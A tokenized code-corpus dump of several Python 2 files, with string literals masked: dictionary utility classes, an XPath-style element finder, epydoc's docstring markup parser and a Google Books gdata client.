keyOrder : <EOL> self . keyOrder . append ( key ) <EOL> def __delitem__ ( self , key ) : <EOL> super ( SortedDict , self ) . __delitem__ ( key ) <EOL> self . keyOrder . remove ( key ) <EOL> def __iter__ ( self ) : <EOL> for k in self . keyOrder : <EOL> yield k <EOL> def pop ( self , k , * args ) : <EOL> result = super ( SortedDict , self ) . pop ( k , * args ) <EOL> try : <EOL> self . keyOrder . remove ( k ) <EOL> except ValueError : <EOL> pass <EOL> return result <EOL> def popitem ( self ) : <EOL> result = super ( SortedDict , self ) . popitem ( ) <EOL> self . keyOrder . remove ( result [ <NUM_LIT:0> ] ) <EOL> return result <EOL> def items ( self ) : <EOL> return zip ( self . keyOrder , self . values ( ) ) <EOL> def iteritems ( self ) : <EOL> for key in self . keyOrder : <EOL> yield key , super ( SortedDict , self ) . __getitem__ ( key ) <EOL> def keys ( self ) : <EOL> return self . keyOrder [ : ] <EOL> def iterkeys ( self ) : <EOL> return iter ( self . keyOrder ) <EOL> def values ( self ) : <EOL> return [ super ( SortedDict , self ) . __getitem__ ( k ) for k in self . keyOrder ] <EOL> def itervalues ( self ) : <EOL> for key in self . keyOrder : <EOL> yield super ( SortedDict , self ) . __getitem__ ( key ) <EOL> def update ( self , dict_ ) : <EOL> for k , v in dict_ . items ( ) : <EOL> self . __setitem__ ( k , v ) <EOL> def setdefault ( self , key , default ) : <EOL> if key not in self . keyOrder : <EOL> self . keyOrder . append ( key ) <EOL> return super ( SortedDict , self ) . setdefault ( key , default ) <EOL> def value_for_index ( self , index ) : <EOL> """<STR_LIT>""" <EOL> return self [ self . keyOrder [ index ] ] <EOL> def insert ( self , index , key , value ) : <EOL> """<STR_LIT>""" <EOL> if key in self . keyOrder : <EOL> n = self . keyOrder . index ( key ) <EOL> del self . keyOrder [ n ] <EOL> if n < index : <EOL> index -= <NUM_LIT:1> <EOL> self . keyOrder . insert ( index , key ) <EOL> super ( SortedDict , self ) . 
__setitem__ ( key , value ) <EOL> def copy ( self ) : <EOL> """<STR_LIT>""" <EOL> obj = self . __class__ ( self ) <EOL> obj . keyOrder = self . keyOrder [ : ] <EOL> return obj <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( [ '<STR_LIT>' % ( k , v ) for k , v in self . items ( ) ] ) <EOL> def clear ( self ) : <EOL> super ( SortedDict , self ) . clear ( ) <EOL> self . keyOrder = [ ] <EOL> class MultiValueDictKeyError ( KeyError ) : <EOL> pass <EOL> class MultiValueDict ( dict ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , key_to_list_mapping = ( ) ) : <EOL> super ( MultiValueDict , self ) . __init__ ( key_to_list_mapping ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . __class__ . __name__ , <EOL> super ( MultiValueDict , self ) . __repr__ ( ) ) <EOL> def __getitem__ ( self , key ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> list_ = super ( MultiValueDict , self ) . __getitem__ ( key ) <EOL> except KeyError : <EOL> raise MultiValueDictKeyError , "<STR_LIT>" % ( key , self ) <EOL> try : <EOL> return list_ [ - <NUM_LIT:1> ] <EOL> except IndexError : <EOL> return [ ] <EOL> def __setitem__ ( self , key , value ) : <EOL> super ( MultiValueDict , self ) . __setitem__ ( key , [ value ] ) <EOL> def __copy__ ( self ) : <EOL> return self . __class__ ( super ( MultiValueDict , self ) . items ( ) ) <EOL> def __deepcopy__ ( self , memo = None ) : <EOL> import copy <EOL> if memo is None : <EOL> memo = { } <EOL> result = self . __class__ ( ) <EOL> memo [ id ( self ) ] = result <EOL> for key , value in dict . items ( self ) : <EOL> dict . __setitem__ ( result , copy . deepcopy ( key , memo ) , <EOL> copy . deepcopy ( value , memo ) ) <EOL> return result <EOL> def __getstate__ ( self ) : <EOL> obj_dict = self . __dict__ . copy ( ) <EOL> obj_dict [ '<STR_LIT>' ] = dict ( [ ( k , self . 
getlist ( k ) ) for k in self ] ) <EOL> return obj_dict <EOL> def __setstate__ ( self , obj_dict ) : <EOL> data = obj_dict . pop ( '<STR_LIT>' , { } ) <EOL> for k , v in data . items ( ) : <EOL> self . setlist ( k , v ) <EOL> self . __dict__ . update ( obj_dict ) <EOL> def get ( self , key , default = None ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> val = self [ key ] <EOL> except KeyError : <EOL> return default <EOL> if val == [ ] : <EOL> return default <EOL> return val <EOL> def getlist ( self , key ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return super ( MultiValueDict , self ) . __getitem__ ( key ) <EOL> except KeyError : <EOL> return [ ] <EOL> def setlist ( self , key , list_ ) : <EOL> super ( MultiValueDict , self ) . __setitem__ ( key , list_ ) <EOL> def setdefault ( self , key , default = None ) : <EOL> if key not in self : <EOL> self [ key ] = default <EOL> return self [ key ] <EOL> def setlistdefault ( self , key , default_list = ( ) ) : <EOL> if key not in self : <EOL> self . setlist ( key , default_list ) <EOL> return self . getlist ( key ) <EOL> def appendlist ( self , key , value ) : <EOL> """<STR_LIT>""" <EOL> self . setlistdefault ( key , [ ] ) <EOL> super ( MultiValueDict , self ) . __setitem__ ( key , self . getlist ( key ) + [ value ] ) <EOL> def items ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ ( key , self [ key ] ) for key in self . keys ( ) ] <EOL> def iteritems ( self ) : <EOL> """<STR_LIT>""" <EOL> for key in self . keys ( ) : <EOL> yield ( key , self [ key ] ) <EOL> def lists ( self ) : <EOL> """<STR_LIT>""" <EOL> return super ( MultiValueDict , self ) . items ( ) <EOL> def iterlists ( self ) : <EOL> """<STR_LIT>""" <EOL> return super ( MultiValueDict , self ) . iteritems ( ) <EOL> def values ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ self [ key ] for key in self . keys ( ) ] <EOL> def itervalues ( self ) : <EOL> """<STR_LIT>""" <EOL> for key in self . 
iterkeys ( ) : <EOL> yield self [ key ] <EOL> def copy ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __deepcopy__ ( ) <EOL> def update ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if len ( args ) > <NUM_LIT:1> : <EOL> raise TypeError , "<STR_LIT>" % len ( args ) <EOL> if args : <EOL> other_dict = args [ <NUM_LIT:0> ] <EOL> if isinstance ( other_dict , MultiValueDict ) : <EOL> for key , value_list in other_dict . lists ( ) : <EOL> self . setlistdefault ( key , [ ] ) . extend ( value_list ) <EOL> else : <EOL> try : <EOL> for key , value in other_dict . items ( ) : <EOL> self . setlistdefault ( key , [ ] ) . append ( value ) <EOL> except TypeError : <EOL> raise ValueError , "<STR_LIT>" <EOL> for key , value in kwargs . iteritems ( ) : <EOL> self . setlistdefault ( key , [ ] ) . append ( value ) <EOL> class DotExpandedDict ( dict ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , key_to_list_mapping ) : <EOL> for k , v in key_to_list_mapping . items ( ) : <EOL> current = self <EOL> bits = k . split ( '<STR_LIT:.>' ) <EOL> for bit in bits [ : - <NUM_LIT:1> ] : <EOL> current = current . setdefault ( bit , { } ) <EOL> try : <EOL> current [ bits [ - <NUM_LIT:1> ] ] = v <EOL> except TypeError : <EOL> current = { bits [ - <NUM_LIT:1> ] : v } <EOL> class ImmutableList ( tuple ) : <EOL> """<STR_LIT>""" <EOL> def __new__ ( cls , * args , ** kwargs ) : <EOL> if '<STR_LIT>' in kwargs : <EOL> warning = kwargs [ '<STR_LIT>' ] <EOL> del kwargs [ '<STR_LIT>' ] <EOL> else : <EOL> warning = '<STR_LIT>' <EOL> self = tuple . __new__ ( cls , * args , ** kwargs ) <EOL> self . warning = warning <EOL> return self <EOL> def complain ( self , * wargs , ** kwargs ) : <EOL> if isinstance ( self . warning , Exception ) : <EOL> raise self . warning <EOL> else : <EOL> raise AttributeError , self . 
warning <EOL> __delitem__ = complain <EOL> __delslice__ = complain <EOL> __iadd__ = complain <EOL> __imul__ = complain <EOL> __setitem__ = complain <EOL> __setslice__ = complain <EOL> append = complain <EOL> extend = complain <EOL> insert = complain <EOL> pop = complain <EOL> remove = complain <EOL> sort = complain <EOL> reverse = complain <EOL> class DictWrapper ( dict ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , data , func , prefix ) : <EOL> super ( DictWrapper , self ) . __init__ ( data ) <EOL> self . func = func <EOL> self . prefix = prefix <EOL> def __getitem__ ( self , key ) : <EOL> """<STR_LIT>""" <EOL> if key . startswith ( self . prefix ) : <EOL> use_func = True <EOL> key = key [ len ( self . prefix ) : ] <EOL> else : <EOL> use_func = False <EOL> value = super ( DictWrapper , self ) . __getitem__ ( key ) <EOL> if use_func : <EOL> return self . func ( value ) <EOL> return value </s>
<s> import re <EOL> xpath_tokenizer = re . compile ( <EOL> "<STR_LIT:(>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) . findall <EOL> def prepare_tag ( next , token ) : <EOL> tag = token [ <NUM_LIT:1> ] <EOL> def select ( context , result ) : <EOL> for elem in result : <EOL> for e in elem : <EOL> if e . tag == tag : <EOL> yield e <EOL> return select <EOL> def prepare_star ( next , token ) : <EOL> def select ( context , result ) : <EOL> for elem in result : <EOL> for e in elem : <EOL> yield e <EOL> return select <EOL> def prepare_dot ( next , token ) : <EOL> def select ( context , result ) : <EOL> for elem in result : <EOL> yield elem <EOL> return select <EOL> def prepare_iter ( next , token ) : <EOL> token = next ( ) <EOL> if token [ <NUM_LIT:0> ] == "<STR_LIT:*>" : <EOL> tag = "<STR_LIT:*>" <EOL> elif not token [ <NUM_LIT:0> ] : <EOL> tag = token [ <NUM_LIT:1> ] <EOL> else : <EOL> raise SyntaxError <EOL> def select ( context , result ) : <EOL> for elem in result : <EOL> for e in elem . iter ( tag ) : <EOL> if e is not elem : <EOL> yield e <EOL> return select <EOL> def prepare_dot_dot ( next , token ) : <EOL> def select ( context , result ) : <EOL> parent_map = context . parent_map <EOL> if parent_map is None : <EOL> context . parent_map = parent_map = { } <EOL> for p in context . root . iter ( ) : <EOL> for e in p : <EOL> parent_map [ e ] = p <EOL> for elem in result : <EOL> if elem in parent_map : <EOL> yield parent_map [ elem ] <EOL> return select <EOL> def prepare_predicate ( next , token ) : <EOL> token = next ( ) <EOL> if token [ <NUM_LIT:0> ] == "<STR_LIT:@>" : <EOL> token = next ( ) <EOL> if token [ <NUM_LIT:0> ] : <EOL> raise SyntaxError ( "<STR_LIT>" ) <EOL> key = token [ <NUM_LIT:1> ] <EOL> token = next ( ) <EOL> if token [ <NUM_LIT:0> ] == "<STR_LIT:]>" : <EOL> def select ( context , result ) : <EOL> for elem in result : <EOL> if elem . 
get ( key ) is not None : <EOL> yield elem <EOL> elif token [ <NUM_LIT:0> ] == "<STR_LIT:=>" : <EOL> value = next ( ) [ <NUM_LIT:0> ] <EOL> if value [ : <NUM_LIT:1> ] == "<STR_LIT:'>" or value [ : <NUM_LIT:1> ] == '<STR_LIT:">' : <EOL> value = value [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> else : <EOL> raise SyntaxError ( "<STR_LIT>" ) <EOL> token = next ( ) <EOL> def select ( context , result ) : <EOL> for elem in result : <EOL> if elem . get ( key ) == value : <EOL> yield elem <EOL> if token [ <NUM_LIT:0> ] != "<STR_LIT:]>" : <EOL> raise SyntaxError ( "<STR_LIT>" ) <EOL> elif not token [ <NUM_LIT:0> ] : <EOL> tag = token [ <NUM_LIT:1> ] <EOL> token = next ( ) <EOL> if token [ <NUM_LIT:0> ] != "<STR_LIT:]>" : <EOL> raise SyntaxError ( "<STR_LIT>" ) <EOL> def select ( context , result ) : <EOL> for elem in result : <EOL> if elem . find ( tag ) is not None : <EOL> yield elem <EOL> else : <EOL> raise SyntaxError ( "<STR_LIT>" ) <EOL> return select <EOL> ops = { <EOL> "<STR_LIT>" : prepare_tag , <EOL> "<STR_LIT:*>" : prepare_star , <EOL> "<STR_LIT:.>" : prepare_dot , <EOL> "<STR_LIT:..>" : prepare_dot_dot , <EOL> "<STR_LIT>" : prepare_iter , <EOL> "<STR_LIT:[>" : prepare_predicate , <EOL> } <EOL> _cache = { } <EOL> class _SelectorContext : <EOL> parent_map = None <EOL> def __init__ ( self , root ) : <EOL> self . root = root <EOL> def find ( elem , path ) : <EOL> try : <EOL> return findall ( elem , path ) . next ( ) <EOL> except StopIteration : <EOL> return None <EOL> def findall ( elem , path ) : <EOL> try : <EOL> selector = _cache [ path ] <EOL> except KeyError : <EOL> if len ( _cache ) > <NUM_LIT:100> : <EOL> _cache . clear ( ) <EOL> if path [ : <NUM_LIT:1> ] == "<STR_LIT:/>" : <EOL> raise SyntaxError ( "<STR_LIT>" ) <EOL> stream = iter ( xpath_tokenizer ( path ) ) <EOL> next = stream . next ; token = next ( ) <EOL> selector = [ ] <EOL> while <NUM_LIT:1> : <EOL> try : <EOL> selector . 
append ( ops [ token [ <NUM_LIT:0> ] ] ( next , token ) ) <EOL> except StopIteration : <EOL> raise SyntaxError ( "<STR_LIT>" ) <EOL> try : <EOL> token = next ( ) <EOL> if token [ <NUM_LIT:0> ] == "<STR_LIT:/>" : <EOL> token = next ( ) <EOL> except StopIteration : <EOL> break <EOL> _cache [ path ] = selector <EOL> result = [ elem ] <EOL> context = _SelectorContext ( elem ) <EOL> for select in selector : <EOL> result = select ( context , result ) <EOL> return result <EOL> def findtext ( elem , path , default = None ) : <EOL> try : <EOL> elem = findall ( elem , path ) . next ( ) <EOL> return elem . text <EOL> except StopIteration : <EOL> return default </s>
<s> """<STR_LIT>""" <EOL> __docformat__ = '<STR_LIT>' <EOL> import re , types , sys <EOL> from epydoc import log <EOL> from epydoc . util import plaintext_to_html , plaintext_to_latex <EOL> import epydoc <EOL> from epydoc . compat import * <EOL> _markup_language_registry = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> def register_markup_language ( name , parse_function ) : <EOL> """<STR_LIT>""" <EOL> _markup_language_registry [ name . lower ( ) ] = parse_function <EOL> MARKUP_LANGUAGES_USED = set ( ) <EOL> def parse ( docstring , markup = '<STR_LIT>' , errors = None , ** options ) : <EOL> """<STR_LIT>""" <EOL> raise_on_error = ( errors is None ) <EOL> if errors == None : errors = [ ] <EOL> markup = markup . lower ( ) <EOL> if not re . match ( r'<STR_LIT>' , markup ) : <EOL> _parse_warn ( '<STR_LIT>' <EOL> '<STR_LIT>' % markup ) <EOL> import epydoc . markup . plaintext as plaintext <EOL> return plaintext . parse_docstring ( docstring , errors , ** options ) <EOL> if markup not in _markup_language_registry : <EOL> _parse_warn ( '<STR_LIT>' <EOL> '<STR_LIT>' % markup ) <EOL> import epydoc . markup . plaintext as plaintext <EOL> return plaintext . parse_docstring ( docstring , errors , ** options ) <EOL> parse_docstring = _markup_language_registry [ markup ] <EOL> if isinstance ( parse_docstring , basestring ) : <EOL> try : exec ( '<STR_LIT>' % parse_docstring ) <EOL> except ImportError , e : <EOL> _parse_warn ( '<STR_LIT>' % <EOL> ( parse_docstring , markup , e ) ) <EOL> import epydoc . markup . plaintext as plaintext <EOL> return plaintext . parse_docstring ( docstring , errors , ** options ) <EOL> _markup_language_registry [ markup ] = parse_docstring <EOL> MARKUP_LANGUAGES_USED . add ( markup ) <EOL> try : parsed_docstring = parse_docstring ( docstring , errors , ** options ) <EOL> except KeyboardInterrupt : raise <EOL> except Exception , e : <EOL> if epydoc . 
DEBUG : raise <EOL> log . error ( '<STR_LIT>' <EOL> '<STR_LIT>' % e ) <EOL> import epydoc . markup . plaintext as plaintext <EOL> return plaintext . parse_docstring ( docstring , errors , ** options ) <EOL> fatal_errors = [ e for e in errors if e . is_fatal ( ) ] <EOL> if fatal_errors and raise_on_error : raise fatal_errors [ <NUM_LIT:0> ] <EOL> if fatal_errors : <EOL> import epydoc . markup . plaintext as plaintext <EOL> return plaintext . parse_docstring ( docstring , errors , ** options ) <EOL> return parsed_docstring <EOL> _parse_warnings = { } <EOL> def _parse_warn ( estr ) : <EOL> """<STR_LIT>""" <EOL> global _parse_warnings <EOL> if estr in _parse_warnings : return <EOL> _parse_warnings [ estr ] = <NUM_LIT:1> <EOL> log . warning ( estr ) <EOL> class ParsedDocstring : <EOL> """<STR_LIT>""" <EOL> def split_fields ( self , errors = None ) : <EOL> """<STR_LIT>""" <EOL> return self , [ ] <EOL> def summary ( self ) : <EOL> """<STR_LIT>""" <EOL> return self , False <EOL> def concatenate ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return ConcatenatedDocstring ( self , other ) <EOL> def __add__ ( self , other ) : return self . concatenate ( other ) <EOL> def to_html ( self , docstring_linker , ** options ) : <EOL> """<STR_LIT>""" <EOL> plaintext = plaintext_to_html ( self . to_plaintext ( docstring_linker ) ) <EOL> return '<STR_LIT>' % plaintext <EOL> def to_latex ( self , docstring_linker , ** options ) : <EOL> """<STR_LIT>""" <EOL> plaintext = plaintext_to_latex ( self . to_plaintext ( docstring_linker ) ) <EOL> return '<STR_LIT>' % plaintext <EOL> def to_plaintext ( self , docstring_linker , ** options ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError , '<STR_LIT>' <EOL> def index_terms ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ ] <EOL> class ConcatenatedDocstring : <EOL> def __init__ ( self , * parsed_docstrings ) : <EOL> self . 
_parsed_docstrings = [ pds for pds in parsed_docstrings <EOL> if pds is not None ] <EOL> def split_fields ( self , errors = None ) : <EOL> bodies = [ ] <EOL> fields = [ ] <EOL> for doc in self . _parsed_docstrings : <EOL> b , f = doc . split_fields ( ) <EOL> bodies . append ( b ) <EOL> fields . extend ( f ) <EOL> return ConcatenatedDocstring ( * bodies ) , fields <EOL> def summary ( self ) : <EOL> return self . _parsed_docstrings [ <NUM_LIT:0> ] . summary ( ) <EOL> def to_html ( self , docstring_linker , ** options ) : <EOL> htmlstring = '<STR_LIT>' <EOL> for doc in self . _parsed_docstrings : <EOL> htmlstring += doc . to_html ( docstring_linker , ** options ) <EOL> return htmlstring <EOL> def to_latex ( self , docstring_linker , ** options ) : <EOL> latexstring = '<STR_LIT>' <EOL> for doc in self . _parsed_docstrings : <EOL> latexstring += doc . to_latex ( docstring_linker , ** options ) <EOL> return latexstring <EOL> def to_plaintext ( self , docstring_linker , ** options ) : <EOL> textstring = '<STR_LIT>' <EOL> for doc in self . _parsed_docstrings : <EOL> textstring += doc . to_plaintext ( docstring_linker , ** options ) <EOL> return textstring <EOL> def index_terms ( self ) : <EOL> terms = [ ] <EOL> for doc in self . _parsed_docstrings : <EOL> terms += doc . index_terms ( ) <EOL> return terms <EOL> class Field : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , tag , arg , body ) : <EOL> self . _tag = tag . lower ( ) . strip ( ) <EOL> if arg is None : self . _arg = None <EOL> else : self . _arg = arg . strip ( ) <EOL> self . _body = body <EOL> def tag ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _tag <EOL> def arg ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _arg <EOL> def body ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _body <EOL> def __repr__ ( self ) : <EOL> if self . _arg is None : <EOL> return '<STR_LIT>' % self . _tag <EOL> else : <EOL> return '<STR_LIT>' % ( self . _tag , self . 
_arg ) <EOL> class DocstringLinker : <EOL> """<STR_LIT>""" <EOL> def translate_indexterm ( self , indexterm ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> def translate_identifier_xref ( self , identifier , label = None ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> def url_for ( self , identifier ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> class ParseError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , descr , linenum = None , is_fatal = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> self . _descr = descr <EOL> self . _linenum = linenum <EOL> self . _fatal = is_fatal <EOL> self . _offset = <NUM_LIT:1> <EOL> def is_fatal ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _fatal <EOL> def linenum ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _linenum is None : return None <EOL> else : return self . _offset + self . _linenum <EOL> def set_linenum_offset ( self , offset ) : <EOL> """<STR_LIT>""" <EOL> self . _offset = offset <EOL> def descr ( self ) : <EOL> return self . _descr <EOL> def __str__ ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _linenum is not None : <EOL> return '<STR_LIT>' % ( self . _linenum + self . _offset , self . descr ( ) ) <EOL> else : <EOL> return self . descr ( ) <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _linenum is None : <EOL> return '<STR_LIT>' % self . _offset <EOL> else : <EOL> return '<STR_LIT>' % ( self . _linenum + self . _offset ) <EOL> def __cmp__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( other , ParseError ) : return - <NUM_LIT:1000> <EOL> return cmp ( self . _linenum + self . _offset , <EOL> other . _linenum + other . _offset ) <EOL> def parse_type_of ( obj ) : <EOL> """<STR_LIT>""" <EOL> from epydoc . markup . epytext import ParsedEpytextDocstring <EOL> from xml . dom . minidom import Document <EOL> doc = Document ( ) <EOL> epytext = doc . 
createElement ( '<STR_LIT>' ) <EOL> para = doc . createElement ( '<STR_LIT>' ) <EOL> doc . appendChild ( epytext ) <EOL> epytext . appendChild ( para ) <EOL> if type ( obj ) is types . InstanceType : <EOL> link = doc . createElement ( '<STR_LIT>' ) <EOL> name = doc . createElement ( '<STR_LIT:name>' ) <EOL> target = doc . createElement ( '<STR_LIT:target>' ) <EOL> para . appendChild ( link ) <EOL> link . appendChild ( name ) <EOL> link . appendChild ( target ) <EOL> name . appendChild ( doc . createTextNode ( str ( obj . __class__ . __name__ ) ) ) <EOL> target . appendChild ( doc . createTextNode ( str ( obj . __class__ ) ) ) <EOL> else : <EOL> code = doc . createElement ( '<STR_LIT:code>' ) <EOL> para . appendChild ( code ) <EOL> code . appendChild ( doc . createTextNode ( type ( obj ) . __name__ ) ) <EOL> return ParsedEpytextDocstring ( doc ) </s>
<s> """<STR_LIT>""" <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> __revision__ = "<STR_LIT>" </s>
<s> """<STR_LIT>""" <EOL> __author__ = "<STR_LIT>" <EOL> __copyright__ = "<STR_LIT>" <EOL> from shlex import split <EOL> import gdata . service <EOL> try : <EOL> import books <EOL> except ImportError : <EOL> import gdata . books as books <EOL> BOOK_SERVER = "<STR_LIT>" <EOL> GENERAL_FEED = "<STR_LIT>" <EOL> ITEM_FEED = "<STR_LIT>" <EOL> LIBRARY_FEED = "<STR_LIT>" <EOL> ANNOTATION_FEED = "<STR_LIT>" <EOL> PARTNER_FEED = "<STR_LIT>" <EOL> BOOK_SERVICE = "<STR_LIT>" <EOL> ACCOUNT_TYPE = "<STR_LIT>" <EOL> class BookService ( gdata . service . GDataService ) : <EOL> def __init__ ( self , email = None , password = None , source = None , <EOL> server = BOOK_SERVER , account_type = ACCOUNT_TYPE , <EOL> exception_handlers = tuple ( ) , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> gdata . service . GDataService . __init__ ( self , email = email , <EOL> password = password , service = BOOK_SERVICE , source = source , <EOL> server = server , ** kwargs ) <EOL> self . exception_handlers = exception_handlers <EOL> def search ( self , q , start_index = "<STR_LIT:1>" , max_results = "<STR_LIT>" , <EOL> min_viewability = "<STR_LIT:none>" , feed = GENERAL_FEED , <EOL> converter = books . BookFeed . FromString ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( q , gdata . service . Query ) : <EOL> q = gdata . service . Query ( text_query = q ) <EOL> if feed : <EOL> q . feed = feed <EOL> q [ '<STR_LIT>' ] = start_index <EOL> q [ '<STR_LIT>' ] = max_results <EOL> q [ '<STR_LIT>' ] = min_viewability <EOL> return self . Get ( uri = q . ToUri ( ) , converter = converter ) <EOL> def search_by_keyword ( self , q = '<STR_LIT>' , feed = GENERAL_FEED , start_index = "<STR_LIT:1>" , <EOL> max_results = "<STR_LIT>" , min_viewability = "<STR_LIT:none>" , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> for k , v in kwargs . items ( ) : <EOL> if not v : <EOL> continue <EOL> k = k . 
lower ( ) <EOL> if k == '<STR_LIT>' : <EOL> q = "<STR_LIT>" % ( q , v ) <EOL> elif k == '<STR_LIT>' : <EOL> q = '<STR_LIT>' % ( q , v . strip ( '<STR_LIT:">' ) ) <EOL> elif k == '<STR_LIT>' : <EOL> q = '<STR_LIT>' % ( q , '<STR_LIT:U+0020>' . join ( '<STR_LIT>' % x for x in split ( v ) ) ) <EOL> elif k == '<STR_LIT>' : <EOL> q = '<STR_LIT>' % ( q , '<STR_LIT:U+0020>' . join ( '<STR_LIT>' % x for x in split ( v ) ) ) <EOL> elif k in ( '<STR_LIT>' , '<STR_LIT:title>' , '<STR_LIT>' ) : <EOL> q = '<STR_LIT>' % ( q , '<STR_LIT:U+0020>' . join ( '<STR_LIT>' % ( k , x ) for x in split ( v ) ) ) <EOL> elif k == '<STR_LIT>' : <EOL> q = '<STR_LIT>' % ( q , '<STR_LIT:U+0020>' . join ( '<STR_LIT>' % ( k , x ) for x in split ( v ) ) ) <EOL> elif k == '<STR_LIT>' : <EOL> q = '<STR_LIT>' % ( q , v ) <EOL> elif k == '<STR_LIT>' : <EOL> q = '<STR_LIT>' % ( q , v ) <EOL> elif k == '<STR_LIT>' : <EOL> q = '<STR_LIT>' % ( q , v ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> return self . search ( q . strip ( ) , start_index = start_index , feed = feed , <EOL> max_results = max_results , <EOL> min_viewability = min_viewability ) <EOL> def search_library ( self , q , id = '<STR_LIT>' , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in kwargs : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> feed = LIBRARY_FEED % id <EOL> return self . search ( q , feed = feed , ** kwargs ) <EOL> def search_library_by_keyword ( self , id = '<STR_LIT>' , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in kwargs : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> feed = LIBRARY_FEED % id <EOL> return self . search_by_keyword ( feed = feed , ** kwargs ) <EOL> def search_annotations ( self , q , id = '<STR_LIT>' , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in kwargs : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> feed = ANNOTATION_FEED % id <EOL> return self . 
search ( q , feed = feed , ** kwargs ) <EOL> def search_annotations_by_keyword ( self , id = '<STR_LIT>' , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in kwargs : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> feed = ANNOTATION_FEED % id <EOL> return self . search_by_keyword ( feed = feed , ** kwargs ) <EOL> def add_item_to_library ( self , item ) : <EOL> """<STR_LIT>""" <EOL> feed = LIBRARY_FEED % '<STR_LIT>' <EOL> return self . Post ( data = item , uri = feed , converter = books . Book . FromString ) <EOL> def remove_item_from_library ( self , item ) : <EOL> """<STR_LIT>""" <EOL> return self . Delete ( item . GetEditLink ( ) . href ) <EOL> def add_annotation ( self , item ) : <EOL> """<STR_LIT>""" <EOL> return self . Post ( data = item , uri = ANNOTATION_FEED % '<STR_LIT>' , <EOL> converter = books . Book . FromString ) <EOL> def edit_annotation ( self , item ) : <EOL> """<STR_LIT>""" <EOL> return self . Put ( data = item , uri = item . GetEditLink ( ) . href , <EOL> converter = books . Book . FromString ) <EOL> def get_by_google_id ( self , id ) : <EOL> return self . Get ( ITEM_FEED + id , converter = books . Book . FromString ) <EOL> def get_library ( self , id = '<STR_LIT>' , feed = LIBRARY_FEED , start_index = "<STR_LIT:1>" , <EOL> max_results = "<STR_LIT:100>" , min_viewability = "<STR_LIT:none>" , <EOL> converter = books . BookFeed . FromString ) : <EOL> """<STR_LIT>""" <EOL> q = gdata . service . Query ( ) <EOL> q . feed = feed % id <EOL> q [ '<STR_LIT>' ] = start_index <EOL> q [ '<STR_LIT>' ] = max_results <EOL> q [ '<STR_LIT>' ] = min_viewability <EOL> x = self . Get ( uri = q . ToUri ( ) , converter = converter ) <EOL> while <NUM_LIT:1> : <EOL> for entry in x . entry : <EOL> yield entry <EOL> else : <EOL> l = x . GetNextLink ( ) <EOL> if l : <EOL> x = self . Get ( uri = l . 
href , converter = converter ) <EOL> else : <EOL> break <EOL> def get_annotations ( self , id = '<STR_LIT>' , start_index = "<STR_LIT:1>" , max_results = "<STR_LIT:100>" , <EOL> min_viewability = "<STR_LIT:none>" , converter = books . BookFeed . FromString ) : <EOL> """<STR_LIT>""" <EOL> return self . get_library ( id = id , feed = ANNOTATION_FEED , <EOL> max_results = max_results , min_viewability = min_viewability , <EOL> converter = converter ) </s>
